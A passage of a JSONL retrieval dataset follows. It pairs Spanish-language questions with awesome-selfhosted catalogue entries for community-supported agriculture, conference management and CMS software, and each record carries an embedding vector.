-0.02502, -0.007, -0.1289, -0.03503, -0.05784, 0.04935, -0.01082, -0.09086, 0.03873, -0.07264, -0.04582, 0.00307, 0.00382, -0.10741, 0.02157, 0.06146, 0.00486, 0.03178, 0.06774, -0.00023, -0.11952, -0.01134, 0.03643, -0.05471, 0.01477, -0.06504, 0.01376, -0.03887, -0.00786, -0.00895, 0.0202, 0.04348, 0.01394, -0.04111, 0.09662, -0.01784, 0.08207, 0.04422, 0.01015, 0.0844, -0.00465, -0.08166, -0.04778, -0.0309, -0.02409, -0.05539, -0.01163, 0.01222, -0.00101, 0.02289, 0.00613, 0.02525, -0.00264, -0.00728, 0.06297, 0.02777, 0.0124, -0.0375, 0.0012, -0.01615, -0.00421, 0.01049, -0.05529, 0.06269, -0.07274, -0.09797, -0.00382, 0.0495, 0.01762, 0.00162, -0.08232, -0.04595, -0.02547, -0.08083, -0.02624, 0.01203, -0.02337, -0.06717, 0.01972, 0.03691, -0.01108, -0.0084, -0.01747]} -{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): ACP Admin β€” CSA administration. Manage members, subscriptions, deliveries, drop-off locations, member participation, invoices and emails (documentation in French) [MIT, Ruby]. FoodCoopShop β€” User-friendly software for food-coops [AGPL-3.0, PHP/Docker]. Foodsoft β€” Manage a non-profit food coop (product catalog, ordering, accounting, job scheduling) [AGPL-3.0, Docker/Ruby]. Hive-Pal β€” Mobile-first beekeeping management app for tracking hives, inspections, queen records, and equipment with streamlined data entry optimized for field use [MIT, Nodejs/Docker]. juntagrico β€” Management platform for community gardens and vegetable cooperatives [LGPL-3.0, Python]. Open Food Network β€” Online marketplace for local food. It enables a network of independent online food stores that connect farmers and food hubs with individuals and local businesses [AGPL-3.0, Ruby]. OpenOlitor β€” Administration platform for Community Supported Agriculture groups [AGPL-3.0, Scala].", "indexar": "cΓ³mo me llaman las herramientas gratuitas para administrar grupos de agricultura apoyada", "v": [0.1905, 0.15678, -0.05395, -0.17234, -0.01214, 0.04963, 0.03779, 0.0296, -0.2232, 0.0566, -0.07404, -0.0995, 0.07441, -0.05541, 0.14977, -0.01954, 0.01328, -0.01836, 0.08803, 0.09127, 0.0377, 0.08946, -0.08006, -0.02513, -0.16606, -0.12446, 0.15657, -0.08769, -0.15063, 0.10642, 0.0704, 0.02871, 0.05869, -0.04101, -0.00785, -0.02585, 0.00896, -0.04546, 0.0004, 0.006, -0.17932, -0.01705, -0.01491, -0.11448, -0.0211, -0.02972, -0.04707, -0.03601, -0.0465, -0.00694, -0.13178, -0.14404, -0.01377, -0.05, -0.02909, 0.01029, 0.07131, -0.13675, -0.02927, 0.01553, -0.08977, 0.06524, -0.04218, 0.07152, -0.00856, 0.06631, 0.05254, -0.06987, -0.11493, 0.16073, 0.12785, -0.01992, 0.034, 0.05041, -0.03263, 0.01982, 0.03161, 0.07137, 0.01589, 0.05964, 0.04334, -0.01739, 0.03363, -0.02166, -0.0488, -0.06492, 0.05397, 0.01504, -0.02097, -0.05037, 0.06086, 0.06095, 0.03936, -0.00131, 0.04306, -0.01539, 0.00484, -0.01273, 0.06588, 0.09424, 0.03851, -0.09742, -0.05578, 0.01962, 0.01934, 0.07779, 0.03084, -0.01485, -0.04849, 0.01572, 0.01262, 0.01605, -0.00362, 0.05183, 0.10217, 0.05906, 0.0196, 0.05054, 0.00102, -0.09777, 0.01809, 0.06856, -0.00886, -0.02522, 0.06254, -0.04499, 0.03259, 0.08718, 0.01564, 0.03366, 0.04079, -0.0293, -0.02563, -0.00658, 0.02469, -0.04052, 0.01864, -0.09587, -0.08004, -0.06232, -0.02977, 0.06865, -0.04087, -0.11689, 0.0396, -0.0572, 0.01349, -0.10794, 0.05312, 0.0119, 0.05194, -0.01287, 0.02688, 0.08723, -0.03029, -0.02836, -0.02846, -0.07057, -0.06901, 0.08267, -0.06553, -0.0814, 0.00799, -0.11811, -0.07174, -0.00893, 0.02738, -0.02362, -0.00493, 0.0653, 0.0612, 0.01491, 0.06, 0.04508, -0.01697, -0.05716, -0.01332, -0.04182, 0.0475, -0.05666, 0.01898, 0.02058, -0.02644, -0.03733, -0.01881, -0.00695, -0.05206, -0.00152, 0.08578, 0.10382, -0.0231, 0.07136, -0.02666, -0.07215, 0.00986, 0.00484, -0.05731, -0.03216, -0.01546, -0.01356, -0.04554, -0.08446, -0.04294, -0.05722, 0.01441, -0.01239, -0.04922, 0.00782, -0.00419, 0.04404, 0.04625, 0.04211, 0.0739, -0.07763, -0.01224, -0.08087, -0.01617, -0.04045, -0.03129, 0.04127, 0.02107, -0.0168, 0.04388, -0.00792, 0.02502, 0.01186, -0.0359, 0.04534, 0.07197, 0.01061, -0.01357, -0.00448, -0.03596, -0.03827, 0.02618, -0.05995, 0.06814, -0.03701, -0.07184, 0.06066, 0.06422, 0.07477, 0.01029, -0.01837, -0.11484, -0.06581, -0.03572, -0.02028, -0.00664, -0.03912, -0.02362, 0.02861, -0.00076, -0.00536, 0.0401, -0.01198]} -{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): teikei β€” A web application that maps out community-supported agriculture based on crowdsourced data [AGPL-3.0, Nodejs].", "indexar": "que programa online me ayuda a organizar un huerto comunitario con datos de los vecinos", "v": [0.10912, 0.114, -0.14634, -0.23476, -0.05526, -0.09995, 0.05238, -0.0006, -0.08078, -0.14998, -0.11239, -0.07103, 0.0648, -0.02877, 0.09422, -0.146, 0.18015, -0.07832, 0.04345, 0.0349, -0.13434, 0.08067, 0.12128, 0.10076, -0.11576, -0.12864, 0.05786, 0.05044, -0.00436, 0.07654, 0.10149, -0.00691, -0.11748, 0.08027, -0.02268, 0.00698, 0.05628, -0.00739, -0.03465, -0.11974, -0.09248, 0.03972, -0.08763, -0.0137, -0.0181, 0.0715, -0.05097, -0.09136, 0.03302, -0.0959, -0.09309, -0.05327, 0.00161, -0.06163, 0.05403, -0.0173, -0.0002, -0.09111, -0.05704, -0.0632, -0.10101, -0.00655, 0.03441, 0.02636, 0.01698, 0.07221, 0.03126, 0.12248, -0.04043, 0.02798, 0.00669, 0.09592, 0.0533, -0.11102, -0.07888, 0.01065, 0.05515, 0.01521, -0.03598, -0.06009, -0.03256, 0.08085, 0.09726, 0.01421, -0.0176, -0.04385, -0.00935, -0.02384, 0.05301, -0.04503, 0.12742, 0.07892, -0.00742, 0.01185, 0.04418, 0.01091, 0.10644, 0.04886, 0.03008, 0.04471, -0.03239, -0.08037, -0.07132, 0.01017, 0.03834, 0.04856, 0.00421, 0.08609, -0.11818, 0.04025, 0.03343, 0.04527, 0.06638, -0.12875, 0.02404, -0.02909, 0.00606, 0.00399, 0.01661, -0.04812, 0.00488, 0.02954, 0.08049, 0.02406, 0.0446, -0.04702, 0.02007, 0.06053, 0.00936, 0.11784, -0.11283, 0.0287, 0.0028, -0.02025, -0.00161, 0.03237, -0.10916, -0.10713, -0.03171, -0.02823, 0.00865, 0.01455, -0.10266, -0.00401, 0.04035, -0.1163, 0.01696, -0.00694, -0.0127, 0.01591, 0.09526, 0.05539, 0.05451, 0.03709, -0.09734, -0.0435, -0.01114, -0.07418, -0.03279, -0.01215, -0.05752, -0.02137, 0.01336, -0.04489, -0.01775, -0.071, 0.1074, 0.02383, 0.06087, 0.0263, -0.05188, 0.02293, 0.0001, -0.0493, 0.00561, -0.05656, -0.03703, -0.09362, 0.04972, -0.01619, -0.0776, 0.03772, -0.03201, -0.01921, -0.03363, -0.0419, -0.05106, 0.00116, 0.04194, -0.03031, 0.01315, 0.03978, -0.0017, -0.04519, -0.01371, -0.04412, -0.08729, -0.01236, 0.02373, -0.02537, -0.04941, -0.02375, 0.0241, 0.0384, -4e-05, 0.10572, -0.03248, -0.00239, 0.04616, 0.07028, 0.06059, -0.05089, 0.06124, -0.01916, -0.06844, -0.04745, 0.02046, -0.05001, 0.01349, -0.03445, -0.03683, 0.014, 0.01266, 0.00159, 0.02286, -0.09696, 0.06831, 0.02521, 0.02527, 0.01983, -0.06191, -0.0647, 0.03899, 0.00958, 0.02872, -0.05311, 0.02745, -0.05605, -0.03914, -0.04283, 0.04536, -0.00241, -0.00716, -0.08486, -0.04228, -0.03488, -0.0947, 0.02368, -0.01219, -0.01488, -0.01411, 0.01336, 0.0762, -0.03766, 0.02501, 0.04525]} -{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): teikei β€” A web application that maps out community-supported agriculture based on crowdsourced data [AGPL-3.0, Nodejs].", "indexar": "con que herramienta puedo gestionar el reparto semanal de verduras en mi comunidad", "v": [0.13425, 0.05775, -0.17614, -0.19191, -0.03458, -0.0161, 0.05247, -0.06658, 0.03289, -0.2323, -0.06025, -0.02052, -0.02644, -0.03553, 0.09139, 0.13471, 0.11605, -0.11556, 0.03677, 0.10319, -0.00688, 0.00102, 0.01785, -0.00176, -0.0872, -0.01866, 0.09051, -0.06618, -0.11264, 0.03592, -0.00057, 0.04027, 0.04965, -0.13581, -0.06039, 0.01595, -0.02736, 0.12569, -0.07289, -0.11825, -0.11997, 0.10618, -0.09584, -0.1158, 0.0212, 0.04117, -0.00011, -0.17719, -0.00822, 0.00298, -0.10482, -0.15025, -0.04831, -0.00797, 0.05579, 0.00884, 0.12545, -0.11023, 0.10403, -0.00291, -0.07511, 0.06769, 0.00083, -0.01291, -0.02574, -0.03614, 0.01713, -0.00103, -0.04827, 0.09071, -0.0415, 0.04689, -0.01186, -0.06222, -0.11107, 0.00486, 0.0402, 0.06534, 0.04687, -0.02784, 0.06073, 0.03768, 0.14797, 0.02109, -0.06175, -0.14457, 0.01392, -0.07483, 0.01632, -0.0527, 0.03001, -0.03742, -0.10708, -0.04217, 0.06223, 0.05046, 0.02244, 0.00311, -0.01302, 0.04726, 0.07261, -0.03187, -0.1495, 0.03506, -0.03399, 0.05711, -0.03816, -0.02197, -0.04018, 0.01949, 0.06525, -0.04615, 0.06706, -0.08536, 0.00359, 0.10422, -0.06322, 0.07309, 0.00836, 0.02073, 0.01332, 0.02946, 0.03956, 0.01458, 0.12818, -0.05652, -0.07411, 0.08466, -0.00947, -0.06532, -0.11055, 0.00415, -0.00163, -0.03409, -0.03964, 0.01495, -0.01165, -0.03818, -0.08346, -0.06307, -0.06809, 0.04819, 0.04925, -0.1229, 0.07597, -0.05251, -0.04309, -0.03985, 0.02932, 0.0107, 0.03267, -0.04965, -0.00224, 0.02676, -0.03208, 0.0569, 0.01471, -0.03873, -0.08616, 0.01275, -0.03677, 0.00356, -0.00018, -0.0045, 0.03867, -0.08819, 0.06533, 0.00438, 0.07803, -0.03804, -0.03034, -0.01282, 0.00206, -0.02795, -0.00883, -0.1566, -0.03803, -0.01844, -0.01334, 0.0113, -0.04443, 0.05916, -0.10542, -0.0626, -0.00864, -0.03127, -0.09784, 0.05509, 0.02516, 0.0243, 0.03348, 0.06293, 0.02007, -0.07293, -0.01, 0.04155, -0.03307, 0.00599, -0.03393, 0.01631, -0.04747, 0.00664, 0.01397, -0.01042, 0.0232, 0.04238, -0.02009, 0.04577, -0.01455, 0.06192, 0.03184, 0.02663, 0.03347, -0.03733, -0.04833, -0.05637, 0.03443, -0.01013, -0.06493, -0.00525, 0.03395, 0.02293, 0.07228, -0.02588, -0.00827, 0.00786, -0.00745, -0.02722, 0.04706, -0.0064, 0.02812, -0.00636, 0.01898, -0.04378, 0.01553, -0.05182, 0.05701, -0.05591, -0.09742, 0.01376, 0.02822, 0.06766, 0.02597, -0.02863, -0.03477, -0.02743, -0.04211, -0.00142, -0.02478, -0.04105, -0.00573, 0.03236, 0.04534, -0.03448, 0.03427, -0.03815]} -{"tipo": "pregunta", "herramienta": "Conference Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Conference Management", "tema": "conference management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Conference Management: indico β€” Feature-rich event management system, made @ CERN, the place where the Web was born [MIT, Python]. motion.tools (AntragsgrΓΌn) β€” Manage motions and amendments for (political) conventions [AGPL-3.0, PHP/Docker]. OpenSlides β€” Presentation and assembly system for managing and projecting agenda, motions and elections of an assembly [MIT, Docker]. osem β€” Event management tailored to free Software conferences [MIT, Ruby/Docker]. pretalx β€” Web-based event management, including running a Call for Papers, reviewing submissions, and scheduling talks. Exports and imports for various related tools [Apache-2.0, Python].", "indexar": "quΓ© programa puedo usar para organizar eventos y conferencias?", "v": [0.04312, 0.14771, -0.09999, -0.2076, 0.04775, -0.05649, 0.01958, -0.02456, -0.1107, -0.1395, -0.19635, -0.0207, -0.06404, -0.07744, -0.03047, 0.0919, 0.1734, -0.05711, 0.07398, 0.03072, -0.07309, 0.05478, -0.08176, -0.01347, -0.02512, -0.05792, 0.11707, -0.03404, 0.00708, -0.06434, -0.00614, 0.03819, 0.06671, -0.08805, 0.06999, 0.01911, -0.00457, 0.06108, -0.09581, -0.02948, -0.15345, 0.02227, -0.06884, 0.00619, 0.10936, -0.06718, -0.05603, 0.01882, -0.09008, -0.04743, 0.00861, 0.03967, -0.02349, 0.01616, 0.0202, -0.11813, -0.168, -0.13199, -0.06466, 0.02229, 0.00507, 0.009, -0.00511, 0.06607, 0.0672, 0.03556, -0.00504, -0.00438, -0.04197, 0.03431, -0.16506, -0.09522, 0.04983, 0.04374, 0.07589, 0.08546, -0.03032, 0.02998, -0.03298, 0.06249, -0.077, 0.04497, 0.04752, 0.11437, -0.12203, -0.01386, 0.06447, -0.0367, -0.03781, -0.00674, -0.02393, 0.04732, 0.08527, -0.06875, -0.02189, -0.12496, 0.14717, 0.06193, 0.04472, 0.03541, 0.01314, -0.01184, -0.01393, 0.05665, -0.10262, 0.02232, 0.06315, 0.00275, 0.01328, -0.0337, -0.07576, 0.03002, -0.08546, -0.02844, -0.04302, -0.03427, 0.1003, -0.06523, 0.08739, -0.02214, -0.01837, 0.03839, 0.02972, 0.02215, 0.02806, 0.02504, -0.01924, 0.18973, -0.02856, 0.02494, 0.07875, -0.04624, -0.04275, -0.02363, -0.00144, -0.05023, -0.00297, -0.07712, 0.03383, -0.03651, -0.00317, 0.06889, -0.02669, -0.03517, 0.05752, 0.00853, 0.04113, -0.01614, -0.01481, 0.03652, 0.08105, 0.00255, 0.01868, 0.07426, -0.0537, -0.12858, -0.06827, -0.07804, 0.00698, 0.03257, -0.13371, -0.00939, 0.0229, -0.06668, 0.06408, -0.05071, 0.06961, 0.01965, -0.00678, 0.12997, 0.01758, 0.0995, 0.0479, -0.07041, -0.02966, -0.02378, -0.00917, -0.09382, 0.00545, -0.09052, -0.0065, 0.03607, -0.02228, -0.00928, 0.02729, 0.01182, 0.03842, 0.05086, 0.04301, -0.01971, -0.01677, 0.07557, 0.0557, -0.07972, -0.01593, -0.02544, -0.06776, -0.09221, 0.05057, -0.02472, -0.02845, 0.01308, -0.00858, 0.02729, 0.06543, 0.03232, -0.07505, 0.03545, 0.03421, 0.09682, -0.00184, -0.00827, 0.06051, -0.03234, -0.07335, -0.01891, -0.03645, 0.04644, 0.05696, 0.03703, 0.0415, -0.00765, -0.02267, 0.00986, 0.05031, -0.06829, -0.00666, -0.0229, 0.03996, 0.05581, -0.0027, 0.00014, 0.00691, 0.02995, 0.0027, -0.00203, 0.01983, -0.0056, 0.01052, -0.03331, -0.06853, 0.03635, -0.0028, -0.06273, -0.01418, 0.00767, -0.07487, 0.07081, -0.03796, -0.0117, 0.02251, 0.04531, 0.07621, -0.05165, -0.00295, 0.07339]} -{"tipo": "pregunta", "herramienta": "Conference Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Conference Management", "tema": "conference management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Conference Management: indico β€” Feature-rich event management system, made @ CERN, the place where the Web was born [MIT, Python]. motion.tools (AntragsgrΓΌn) β€” Manage motions and amendments for (political) conventions [AGPL-3.0, PHP/Docker]. OpenSlides β€” Presentation and assembly system for managing and projecting agenda, motions and elections of an assembly [MIT, Docker]. osem β€” Event management tailored to free Software conferences [MIT, Ruby/Docker]. pretalx β€” Web-based event management, including running a Call for Papers, reviewing submissions, and scheduling talks. Exports and imports for various related tools [Apache-2.0, Python].", "indexar": "con quΓ© herramienta puedo gestionar mociones en un congreso polΓ­tico?", "v": [-0.02249, 0.06904, 0.15237, -0.1752, 0.05473, -0.0752, 0.01932, -0.05882, -0.11496, -0.14969, -0.08324, 0.01341, 0.01672, -0.03225, 0.02729, 0.07516, 0.1849, -0.11469, -0.01731, -0.02566, -0.07464, -0.05797, 0.09646, -0.05285, -0.05129, -0.05935, 0.06898, -0.10164, -0.08518, -0.0079, -0.09594, -0.01287, 0.04926, -0.11197, 0.01572, 0.05321, -0.06344, 0.17722, -0.03867, 0.04599, -0.12995, 0.02367, -0.08771, 0.01966, 0.00628, -0.14947, -0.02803, -0.11227, -0.02509, 0.07359, -0.11273, -0.15943, -0.11944, 0.06916, 0.04397, -0.02851, 0.00669, -0.08358, 0.02323, -0.05888, -0.12075, 0.12361, -0.02212, 0.05874, -0.00424, 0.06224, -0.01667, -0.04489, -0.00657, 0.10821, -0.05475, 0.01472, 0.03024, 0.02056, 0.06149, -0.0067, 0.06319, 0.08965, -0.03526, -0.01053, 0.11558, -0.08592, -0.16322, 0.03227, -0.07268, -0.07284, 0.08768, -0.04097, -0.01478, 0.00682, -0.08392, 0.05786, -0.0234, -0.11513, -0.03494, 0.02554, -0.00995, 0.05046, -0.02824, -0.01145, 0.06889, 0.02122, -0.10742, 0.05142, -0.01798, -0.06627, 0.0328, -0.03375, -0.00411, -0.00223, -0.08216, 0.10767, 0.07715, 0.01013, 0.07171, 0.02806, -0.02485, -0.05736, -0.01789, -0.07794, -0.03633, 0.03631, -0.04542, -0.00055, 0.07112, 0.00941, -0.01899, 0.08999, -0.04927, -0.0181, -0.05711, -0.12966, -0.09002, -0.09299, 0.01059, -0.04305, 0.00504, -0.10104, 0.00295, -0.08795, -0.0346, 0.10939, -0.01605, -0.09437, 0.03162, -0.06795, 0.04372, 0.00213, 0.04276, 0.01854, 0.08845, -0.08859, 0.04939, 0.08052, -0.0397, -0.00964, -0.06574, -0.03292, -0.04523, -0.09514, -0.1482, -0.03511, 0.03138, 0.00098, 0.02704, 0.00425, -0.04478, -0.00343, 0.0136, 0.05572, 0.00193, 0.05267, 0.05649, -0.06486, 0.03798, -0.07847, -0.03995, -0.03334, 0.03753, -0.08444, -0.02144, 0.00336, 0.00444, -0.07282, 0.0418, -0.03188, -0.02269, -0.01802, 0.01787, 0.00494, 0.00133, 0.05059, 0.01816, -0.01105, 0.03561, 0.00274, 0.02907, -0.06776, 0.05442, 0.00538, -0.07039, -0.00123, 0.02311, -0.03425, 0.01531, 0.06038, -0.04988, 0.03073, 0.05478, -0.02453, -0.02023, 0.02062, -0.0208, 0.01742, -0.02454, -0.01218, 0.00878, 0.06504, -0.05199, -0.06711, 0.01067, -0.03328, 0.08666, 0.00035, 0.00938, -0.00919, -0.01573, 0.01168, 0.04011, 0.01657, 0.06853, 0.03987, -0.02557, 0.01981, 0.00736, -0.08092, 0.04701, -0.03747, -0.05582, 0.03046, -0.00695, 0.00965, 0.05604, -0.08087, -0.05207, -0.03192, -0.04666, 0.04752, -0.05724, -0.0336, -0.00021, 0.00116, 0.05376, -0.10042, 0.03551, 0.03678]} -{"tipo": "pregunta", "herramienta": "Conference Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Conference Management", "tema": "conference management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Conference Management: indico β€” Feature-rich event management system, made @ CERN, the place where the Web was born [MIT, Python]. motion.tools (AntragsgrΓΌn) β€” Manage motions and amendments for (political) conventions [AGPL-3.0, PHP/Docker]. OpenSlides β€” Presentation and assembly system for managing and projecting agenda, motions and elections of an assembly [MIT, Docker]. osem β€” Event management tailored to free Software conferences [MIT, Ruby/Docker]. pretalx β€” Web-based event management, including running a Call for Papers, reviewing submissions, and scheduling talks. Exports and imports for various related tools [Apache-2.0, Python].", "indexar": "existe alguna alternativa libre a Pretalx para la gestiΓ³n de ponencias?", "v": [0.08474, 0.02703, -0.11988, 0.02056, 0.01881, -0.02173, 0.13397, -0.20153, -0.22937, -0.08059, 0.04575, 0.02405, 0.07623, 0.0428, 0.00166, 0.00645, -0.00047, -0.07207, 0.10416, 0.01202, -0.22638, -0.01188, -0.08371, -0.09406, 0.06805, -0.08737, 0.03802, -0.14391, 0.03491, -0.00511, 0.05378, -0.04416, -0.07225, 0.07057, -0.01437, 0.02824, 0.05043, 0.10511, 0.13289, -0.0359, -0.02859, -0.01569, 0.03291, 0.10116, 0.02519, -0.079, -0.14675, 0.11134, -0.12178, 0.05222, -0.07858, -0.0354, 0.01396, 0.0377, 0.18129, 0.02349, 0.02553, -0.03175, -0.04685, -0.09114, -0.02717, 0.08876, 0.02347, -0.04816, 0.07678, 0.0404, -0.01158, 0.01374, -0.09054, 0.14914, -0.01294, -0.13084, 0.00095, 0.01131, -0.01014, -0.09982, -0.02636, 0.11679, -0.05504, 0.07365, 0.07091, -0.07069, 0.03211, 0.02808, -0.08358, -0.05315, 0.00098, -0.16804, 0.01041, 0.0477, -0.07874, -0.03815, -0.01298, -0.02725, 0.00375, -0.06169, -0.00628, 0.09543, 0.00984, 0.04378, 0.07824, 0.11665, -0.07059, -0.00961, 0.00328, 0.01192, 0.00694, -0.05387, -0.00322, -0.00252, -0.02766, -0.02502, 0.03156, -0.05542, -0.0381, -0.03151, -0.0061, 0.11269, -0.03588, -0.00186, 0.03458, -0.08437, 0.00351, -0.06088, 0.0391, 0.038, -0.01409, 0.09412, -0.01338, 0.04319, 0.12392, -0.13413, -0.00804, -0.08693, -0.02479, -0.02538, 0.07714, 0.04878, -0.06383, -0.00114, -0.05874, 0.04383, 0.00205, -0.05956, -0.03939, -0.05358, 0.02811, 0.03581, 0.04632, -0.00978, -0.05465, -0.03873, 0.01689, 0.12642, -0.0536, 0.0597, -0.01583, 0.00314, -0.09509, 0.07449, -0.02601, -0.04275, -0.0212, 0.035, -0.05937, 0.04392, 0.04321, 0.01773, -0.02797, 0.08588, 0.04619, 0.10227, 0.0572, -0.1122, 0.01389, -0.04177, -0.03704, -0.13645, 0.04483, -0.13695, 0.10079, -0.01268, -0.07692, 0.00955, 0.03822, -0.01176, 0.00408, 0.02751, -0.05456, 0.03281, 0.01365, -0.0172, 0.0123, -0.03367, 0.03129, -0.01353, 0.00247, -0.10121, 0.0215, 0.00372, -0.03506, -0.05202, 0.01757, -0.04238, 0.0315, 0.02688, -0.05176, 0.01042, 0.00735, 0.06339, 0.01082, 0.01958, -0.0284, -0.01846, -0.00966, -0.00468, -0.01968, -0.01661, 0.04888, 0.0166, 0.0299, 0.02476, 0.01483, 0.02865, 0.08612, 0.02725, -0.00998, 0.05142, -0.05212, -0.0445, 0.03631, -0.00743, 0.00741, 0.03878, 0.00323, -0.02733, 0.03429, 0.03746, 0.03746, -0.00901, 0.02106, 0.06104, -0.04372, -0.01927, -0.02624, -0.01884, -0.06173, 0.01921, -0.01537, -0.01581, 0.02472, 0.02285, -0.04596, -0.00892, 0.02031, 0.0138]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Alfresco Community Edition β€” The open source Enterprise Content Management software that handles any type of content, allowing users to easily share and collaborate on content [LGPL-3.0, Java]. Apostrophe β€” CMS with a focus on extensible in-context editing tools [MIT, Nodejs]. Automad β€” Flat-file content management system and template engine [MIT, PHP/Docker]. Backdrop CMS β€” Comprehensive CMS for small to medium sized businesses and non-profits [GPL-2.0, PHP]. Bludit β€” Build a site or blog in seconds. Bludit uses flat-files (text files in JSON format) to store posts and pages [⚠, MIT, PHP]. Bolt CMS β€” Content Management Tool, which strives to be as simple and straightforward as possible [MIT, PHP]. CMS Made Simple β€” Faster and easier management of website contents, scalable for small businesses to large corporations [GPL-2.0, PHP]. Cockpit β€” Simple content platform to manage any structured content [MIT, PHP]. Concrete 5 CMS β€” Open source content management system [MIT, PHP].", "indexar": "que programa sirve para gestionar el contenido de una web si no quiero pagar licencias?", "v": [0.02549, 0.04934, -0.14115, -0.217, 0.09427, -0.16475, -0.05746, -0.06059, -0.10658, -0.14068, 0.07055, -0.19161, 0.06975, -0.12241, 0.05187, 0.0997, 0.06607, -0.14505, 0.08658, 0.10185, 0.03062, 0.0776, -0.01026, -0.0697, -0.06882, 0.00065, 0.13379, -0.13458, -0.1379, 0.14679, -0.03887, -0.02326, 0.0644, -0.09352, 0.07007, 0.09225, 0.03323, 0.10206, 0.09553, 0.02254, 0.07066, 0.06225, -0.02846, -0.00532, -0.04379, -0.06582, 0.07551, -0.02856, 0.0815, -0.04373, -0.00667, -0.0285, -0.06796, -0.05353, 0.05471, -0.00776, 0.05161, -0.15924, -0.02266, -0.01813, -0.06873, 0.00169, 0.08218, 0.02706, -0.06445, 0.0747, 0.1474, 0.11614, 0.02516, 0.04152, -0.06103, -0.02399, 0.0745, -0.00868, -0.02431, -0.05186, -0.04692, -0.07544, 0.00826, 0.05464, 0.05196, 0.00791, -0.02104, -0.00258, -0.05404, 0.00787, -0.0162, -0.05396, 0.04129, -0.01708, 0.00518, 0.10109, -0.01652, -0.00828, 0.02305, -0.07028, 0.11139, 0.01999, 0.01097, 0.01931, -0.02606, 0.04188, -0.10594, -0.00351, -0.02661, 0.17741, 0.14272, -0.10265, -0.07364, 0.09726, -0.02987, 0.06046, -0.05162, -0.03788, -0.042, 0.0753, 0.00229, 0.00119, 0.0879, 0.01334, -0.08588, 0.01108, 0.02585, 0.00966, 0.13939, 0.03174, 0.01615, 0.19582, -0.07913, -0.01011, -0.03883, -0.02881, 0.02671, 0.048, -0.04161, -0.03086, 0.0016, -0.01128, -0.07994, -0.04119, -0.01621, 0.07179, -0.00043, 0.08977, 0.06768, -0.03574, -0.03816, -0.05776, -0.0362, -0.01858, -0.00754, -0.07285, -0.04574, 0.05697, -0.10704, 0.00424, -0.0168, -0.05891, -0.05005, 0.05486, 0.00347, 0.03938, -0.04944, -0.00863, 0.03502, 0.04059, -0.06338, 0.05064, 0.04859, 0.07811, -0.00415, 0.03361, 0.02679, -0.04729, 0.06165, -0.01165, -0.02202, -0.10914, -0.0029, 0.00787, -0.06244, -0.00155, 0.00238, 0.0336, -0.04161, 0.02082, -0.07277, 0.07417, -0.03899, 0.00765, 0.00159, 0.01082, 0.00161, -0.01791, 0.06244, -0.01559, -0.06919, -0.00131, -0.02303, -0.03075, -0.03105, -0.01624, 0.00641, 0.01723, 0.00915, 0.00316, -0.00232, 0.04316, 0.04215, 0.03535, -0.05084, 0.00709, -0.00452, -0.00425, -0.05125, -0.01236, -0.00073, 0.04717, -0.00733, 0.05417, 0.03881, -0.03849, -0.02934, 0.04384, 0.04732, -0.06123, 0.02347, 0.03905, 0.03989, 0.01704, -0.0463, -0.00374, -0.05529, 0.01664, 0.01975, -0.04571, -0.01607, -0.01806, -0.04219, -0.02962, -0.05349, 0.06116, 0.02382, -0.02419, -0.01044, -0.00315, -0.06592, -0.04918, -0.00502, 0.01081, -0.01986, 0.03731, 0.02224, 0.03093, 0.02678, 0.03568]} -{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Alfresco Community Edition β€” The open source Enterprise Content Management software that handles any type of content, allowing users to easily share and collaborate on content [LGPL-3.0, Java]. Apostrophe β€” CMS with a focus on extensible in-context editing tools [MIT, Nodejs]. Automad β€” Flat-file content management system and template engine [MIT, PHP/Docker]. Backdrop CMS β€” Comprehensive CMS for small to medium sized businesses and non-profits [GPL-2.0, PHP]. Bludit β€” Build a site or blog in seconds. Bludit uses flat-files (text files in JSON format) to store posts and pages [⚠, MIT, PHP]. Bolt CMS β€” Content Management Tool, which strives to be as simple and straightforward as possible [MIT, PHP]. CMS Made Simple β€” Faster and easier management of website contents, scalable for small businesses to large corporations [GPL-2.0, PHP]. Cockpit β€” Simple content platform to manage any structured content [MIT, PHP]. Concrete 5 CMS β€” Open source content management system [MIT, PHP].", "indexar": "cual es una alternativa libre a WordPress para empresas pequeΓ±as?", "v": [0.02111, 0.06032, -0.03195, -0.0526, -0.05098, -0.04264, -0.00385, -0.18096, -0.1205, -0.16291, -0.0419, -0.1162, -0.00134, -0.03645, 0.06051, -0.10425, 0.03381, -0.09406, 0.14475, -0.04408, -0.05552, -0.10715, 